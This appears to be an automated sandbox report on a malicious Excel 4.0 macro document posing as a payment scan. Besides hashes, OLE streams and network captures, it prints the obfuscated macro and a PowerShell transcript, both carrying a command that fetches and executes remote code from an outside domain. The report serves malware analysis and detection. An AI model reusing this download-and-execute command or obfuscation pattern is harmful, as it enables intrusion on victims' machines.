                                                                                                                                                      MD5:07DAAB2C3AB4CA9099FF8F299D5E2CB7
                                                                                                                                                      SHA1:73B959E6E946E6D76240D6B543BEF59D1DC0C59B
                                                                                                                                                      SHA-256:F6F4E4481CC5E08BD9FBF738CA716467B01C4BC253EAFD467E7AA52F04469566
                                                                                                                                                      SHA-512:9BDADA3277A9ED00C5A23E779E038BECDE490554EE443D7DD9BD10CCADED750B5252BCAF0C818C73581A1556B53C04F0FE93B15D9363F44186DCC8D0CA12F725
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview: L..................F.... ...m.|.:...).G....).G.................................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L..(R......................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qxx..user.<.......Ny.(R.......S.......................h.a.r.d.z.....~.1.....>Qyx..Desktop.h.......Ny.(R.......Y..............>.......4.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.....(R.. .SCANNE~1.XLS..j......>Qwx(R......h.......................X.S.c.a.n.n.e.d._.2.5.5.2.6.6.6.2.-.P.a.y.m.e.n.t...x.l.s.......b...............-.......a...........>.S......C:\Users\user\Desktop\Scanned_25526662-Payment.xls..3.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.S.c.a.n.n.e.d._.2.5.5.2.6.6.6.2.-.P.a.y.m.e.n.t...x.l.s.........:..,.LB.)...As...`.......X.......648351...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.
                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):180
                                                                                                                                                      Entropy (8bit):4.777475947375911
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:zQtfUDEY5iyBVomMQtfUDEYuNfUDEYmMQtfUDEYv:zQtfUgiiyj6QtfUgffUgKQtfUgC
                                                                                                                                                      MD5:454B08023C04D3D51E0919A5D30DA746
                                                                                                                                                      SHA1:3336E8A93B0E884C45B296387403119179914226
                                                                                                                                                      SHA-256:DE4EB7D21A212470F415C1FB45320ABABA55E34DFB9F07688A4A02A60AE83127
                                                                                                                                                      SHA-512:396A1DF4508194B3CBDE3D17EB9FD87B15F41540C6CE7B234920959F9F87374205ADA300E1F29C17020891AE1547916FAACBD7C05115216FD5A06DA192991B6E
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: [xls]..Scanned_25526662-Payment.xls.LNK=0..Desktop.LNK=0..[xls]..Scanned_25526662-Payment.xls.LNK=0..Scanned_25526662-Payment.xls.LNK=0..[xls]..Scanned_25526662-Payment.xls.LNK=0..
                                                                                                                                                      C:\Users\user\Desktop\1BA10000
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):138781
                                                                                                                                                      Entropy (8bit):7.488943905849951
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:b4xEtjPOtioVjDGUU1qfDlaGGx+cL2QnAkHwSJtUkUlR/FoeHxv7nalHDCfZoCFg:ExEtjPOtioVjDGUU1qfDlavx+W2QnA8V
                                                                                                                                                      MD5:F469584A496D5D74D979C15062D580AC
                                                                                                                                                      SHA1:F6403FB404A3FDD9EA3E0367D3727DA89F9A25FE
                                                                                                                                                      SHA-256:2E2ABE8548C697A7BBDDDFF2BB418B525697CA389CB7CBA7778923933CD2B11C
                                                                                                                                                      SHA-512:AF28B72F53DB255C5D151D7727310591F0ADAF3047A8AB3BB87803762BF9BEB6ED8143DA520B56E8EC22F9C5F085F297E15A7AA39E08FBE68D16B3702AEDEDB3
                                                                                                                                                      Malicious:false
                                                                                                                                                      Yara Hits:
                                                                                                                                                      • Rule: PowerShell_Case_Anomaly, Description: Detects obfuscated PowerShell hacktools, Source: C:\Users\user\Desktop\1BA10000, Author: Florian Roth
                                                                                                                                                      Preview: ........T8..........................\.p....pratesh B.....a.........=...............................................=.....<.WN..8.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...h...8...........C.a.m.b.r.i.a.1...,...8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1.......8...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1.......<...........C.a.l.i.b.r.i.1.......>...........C.a.l.i.b.r.i.1.......?...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1.......4...........C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.........."$"
                                                                                                                                                      C:\Users\user\Documents\20210108\PowerShell_transcript.648351.+jaH7BR7.20210108094000.txt
                                                                                                                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1281
                                                                                                                                                      Entropy (8bit):5.311363078079541
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:BxSARxvBnFx2DOXNl/jRW3HjeTKKjX4CIym1ZJXr91/jRVuKs8MXiV+PzgBtoBng:BZzvhFoOo3qDYB1ZHVZW2+rg2ZZE
                                                                                                                                                      MD5:D1CE0F106AF1204373AC13154D9B14EA
                                                                                                                                                      SHA1:4CB49D8EAB791DB13768114C75CD8E8057E5D531
                                                                                                                                                      SHA-256:C9BB7F2DC406C7994C987045761ADB7FF1E7D249E25DFA242AE26056E819A66D
                                                                                                                                                      SHA-512:C17A77B0E81F5AD9398175EA621E3BF0640B9C46A4A97BDA73B7F8F340C882DAD80BE38CA884E1C25104541C4D14B00E4C0C664DB0E6A9E139EC64DE45B06259
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: .**********************..Windows PowerShell transcript start..Start time: 20210108094013..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 648351 (Microsoft Windows NT 10.0.17134.0)..Host Application: PoWErsHEll -ex ByPASs -nop -w 1 IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))..Process ID: 6940..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210108094013..**********************..PS>IeX( cUrl ('http://lankarecipes.com/Sparc.jp' + 'g' ))..False..C:\Users\user\AppData\Local\Temp\Test1.txt..C:\Users\user\AppData\Local\Temp\Test2.gif.. 1 file(s) copied...Executing (Win32_Process)->Create()..Method execution successful...Out Parameters:..instance of __PARA
                                                                                                                                                      \Device\ConDrv
                                                                                                                                                      Process:C:\Windows\SysWOW64\wbem\WMIC.exe
                                                                                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):160
                                                                                                                                                      Entropy (8bit):5.095703110114614
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgmmdeodJQAiveyzr:Yw7gJGWMXJXKSOdYiygKkXe/egmmdNeF
                                                                                                                                                      MD5:1FDB56CE978F6A325955128E1C40D443
                                                                                                                                                      SHA1:1DEB1C5C447EFFF138618EBE82FBF5808510D6E6
                                                                                                                                                      SHA-256:6182F69DFA4C4EDE52B912E7CC0AD4A0DC54D88D1FC077C2EB48BE81712E2DB2
                                                                                                                                                      SHA-512:5B9C620C94022F245D06DE3372832FE0046324F0E1E34647049FEAD3C4B9CA38FFBFA441BA09C9E537BD6E1F725C965B99E39089AB038E6CD8372E48525DD6A4
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview: Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 4928;...ReturnValue = 0;..};....

                                                                                                                                                      Static File Info

                                                                                                                                                      General

                                                                                                                                                      File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: OBA, Last Saved By: OBA, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Jan 6 16:47:21 2021, Last Saved Time/Date: Wed Jan 6 16:49:04 2021, Security: 0
                                                                                                                                                      Entropy (8bit):7.633929977062203
                                                                                                                                                      TrID:
                                                                                                                                                      • Microsoft Excel sheet (30009/1) 45.83%
                                                                                                                                                      • Microsoft Works Spreadsheet (27457/6) 41.94%
                                                                                                                                                      • Generic OLE2 / Multistream Compound File (8008/1) 12.23%
                                                                                                                                                      File name:Scanned_25526662-Payment.xls
                                                                                                                                                      File size:123904
                                                                                                                                                      MD5:cd7d4543958945e3fab4f0631e3494f3
                                                                                                                                                      SHA1:3e00f26ab9384c9c1bb24eeb2de331f751f536ed
                                                                                                                                                      SHA256:b7a919bb30c1633483399356aedf42c11656c8a076be969e85b57ccdd071b879
                                                                                                                                                      SHA512:72fa901dd83e7b1c4cae3a04221a90d3ddb3b33bc17e7117c60109d7de50a1f68013365062d445d6774ef9a2d584966d5b22724ead59a6850875857d83c341c4
                                                                                                                                                      SSDEEP:3072:ffZ+RwPONXoRjDhIcp0fDlaGGx+cL26nAQHgSJtMrslx/FQeHxvjnqlHDCfVoCF:3Z+RwPONXoRjDhIcp0fDlavx+W26nAIn
                                                                                                                                                      File Content Preview:........................>.......................................................b..............................................................................................................................................................................

                                                                                                                                                      File Icon

                                                                                                                                                      Icon Hash:74ecd4c6c3c6c4d8

                                                                                                                                                      Static OLE Info

                                                                                                                                                      General

                                                                                                                                                      Document Type:OLE
                                                                                                                                                      Number of OLE Files:1

                                                                                                                                                      OLE File "Scanned_25526662-Payment.xls"

                                                                                                                                                      Indicators

                                                                                                                                                      Has Summary Info:True
                                                                                                                                                      Application Name:Microsoft Excel
                                                                                                                                                      Encrypted Document:False
                                                                                                                                                      Contains Word Document Stream:False
                                                                                                                                                      Contains Workbook/Book Stream:True
                                                                                                                                                      Contains PowerPoint Document Stream:False
                                                                                                                                                      Contains Visio Document Stream:False
                                                                                                                                                      Contains ObjectPool Stream:
                                                                                                                                                      Flash Objects Count:
                                                                                                                                                      Contains VBA Macros:True

                                                                                                                                                      Summary

                                                                                                                                                      Code Page:1252
                                                                                                                                                      Author:OBA
                                                                                                                                                      Last Saved By:OBA
                                                                                                                                                      Create Time:2021-01-06 16:47:21
                                                                                                                                                      Last Saved Time:2021-01-06 16:49:04
                                                                                                                                                      Creating Application:Microsoft Excel
                                                                                                                                                      Security:0

                                                                                                                                                      Document Summary

                                                                                                                                                      Document Code Page:1252
                                                                                                                                                      Thumbnail Scaling Desired:False
                                                                                                                                                      Contains Dirty Links:False
                                                                                                                                                      Shared Document:False
                                                                                                                                                      Changed Hyperlinks:False
                                                                                                                                                      Application Version:786432

                                                                                                                                                      Streams

                                                                                                                                                      Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                                                                                      General
                                                                                                                                                      Stream Path:\x1CompObj
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:114
                                                                                                                                                      Entropy:4.25248375193
                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . . 9 . q . . . . . . . . . . . .
                                                                                                                                                      Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                      Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 288
                                                                                                                                                      General
                                                                                                                                                      Stream Path:\x5DocumentSummaryInformation
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:288
                                                                                                                                                      Entropy:3.22237115402
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . M a c r o 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . .
                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 ac 00 00 00 02 00 00 00 e4 04 00 00
                                                                                                                                                      Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                                                                                                                                      General
                                                                                                                                                      Stream Path:\x5SummaryInformation
                                                                                                                                                      File Type:data
                                                                                                                                                      Stream Size:200
                                                                                                                                                      Entropy:3.42401113166
                                                                                                                                                      Base64 Encoded:False
                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O B A . . . . . . . . . O B A . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . . . . K . . . @ . . . . . O . K . . . . . . . . . . .
                                                                                                                                                      Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                                                                                      Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 119481
                                                                                                                                                      General
                                                                                                                                                      Stream Path:Workbook
                                                                                                                                                      File Type:Applesoft BASIC program data, first line number 16
                                                                                                                                                      Stream Size:119481
                                                                                                                                                      Entropy:7.73465408824
                                                                                                                                                      Base64 Encoded:True
                                                                                                                                                      Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . O B A B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . < . W N . . 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . .
                                                                                                                                                      Data Raw:09 08 10 00 00 06 05 00 a9 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 4f 42 41 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                                                                                      Macro 4.0 Code

                                                                                                                                                      "=                                                                        SDs95LPpzopuDcZDU8hUBnJdjpz3DTM   &                      xvpj1SYG7ygbfNzTQgb1pl             &         h4m6iHDrpuC8foIZBCpyw51u0YeZhrROFu8QefOhN            &           n0uXY119a7UTzjVjbzaSc              &                  jeRiWEh13A2xyNeQioR3x                        &                         TXdUbbRAIaBGmbaYT    &              WGkwsmF2sb7S7H9AgMcj3ZTC56Xjh1T6                    &                              mHxeebWDqG799FwPoNJfDQzOVRnYM8LXOG4R2nO3Gpi                       &             LNomLC1O     &                       iEi0eXp8sAGCLXevNQ7                   &           ppWJ1V7MBOumusr6mgFOCISN0FhM9mji     &          h7SaY8nqb57oK4XDdUUaFgoVIKa                               &        IbtiRrV0IbO3HYPjYeSwMAvYq5CErl3N           & zKVi3cfeEtCEeHLkwmNalEynPuAM                &         PyLprObWf2kwfAb2zu2QEk0XSRIWGspOyGY   &            ZJO5o4Ziyq &         Lr6av3LLfdRIdHyxVZgTvZ                             &                   UWH8HACiUjgg                                & RrHvX68ZqcUCJnDrw5ryT7khTnvgMvL6nm3b4ZCKtSr3Yw3k                 &                mMuy3ChhR4AjwIWFtkiqMkrVu6        &                          ldGDtSSMb8Lla&EXEC(((((((((((""cmd.eXE  /c PoWErsHEll  -ex ByPASs -nop -w 1 IeX( cUrl  ('http://lankarecipes.com/Sparc.jp'  + 'g' ))"")))))))))))"=                            RETURN()

                                                                                                                                                      Network Behavior

                                                                                                                                                      Network Port Distribution

                                                                                                                                                      TCP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Jan 8, 2021 09:40:24.890063047 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.076226950 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.076709032 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.081321955 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.264159918 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.271898031 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.271929979 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.271949053 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.271960974 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.271974087 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.271996975 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.272013903 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.272028923 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.272047997 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.272066116 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.272118092 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.272195101 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.454987049 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455025911 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455038071 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455058098 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455075026 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455090046 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455106020 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455122948 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455141068 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455161095 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455163002 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.455177069 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455195904 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455214024 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455229044 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455233097 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.455245018 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455260992 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455264091 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.455276012 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455291986 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455297947 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.455307961 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455327034 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.455327988 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.455383062 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640362978 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640396118 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640413046 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640428066 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640446901 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640455961 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640477896 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640496969 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640496969 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640512943 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640528917 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640548944 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640548944 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640567064 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640578985 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640584946 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640604019 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640611887 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640624046 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640641928 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640645027 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640666008 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640686035 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640686989 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640703917 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640718937 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640721083 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640736103 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640753031 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640753031 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640768051 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640784025 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640790939 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640799999 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640819073 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640836954 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640845060 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640851974 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640868902 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640885115 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640892029 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640899897 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640923977 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640924931 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640940905 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640957117 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640975952 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.640976906 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.640994072 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.641001940 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.641011000 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.641027927 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.641036034 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.641042948 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.641058922 CET8049731192.185.236.165192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:40:25.641066074 CET4973180192.168.2.3192.185.236.165
                                                                                                                                                      Jan 8, 2021 09:40:25.641074896 CET8049731192.185.236.165192.168.2.3

                                                                                                                                                      UDP Packets

                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                      Jan 8, 2021 09:39:43.140170097 CET6349253192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:39:43.190962076 CET53634928.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:39:44.262322903 CET6083153192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:39:44.313060999 CET53608318.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:39:45.916346073 CET6010053192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:39:45.966993093 CET53601008.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:39:47.308192015 CET5319553192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:39:47.356093884 CET53531958.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:39:53.088768005 CET5014153192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:39:53.139488935 CET53501418.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:39:54.186609983 CET5302353192.168.2.38.8.8.8
                                                                                                                                                      Jan 8, 2021 09:39:54.255376101 CET53530238.8.8.8192.168.2.3
                                                                                                                                                      Jan 8, 2021 09:39:54.396749020 CET4956353192.168.2.38.8.8.8
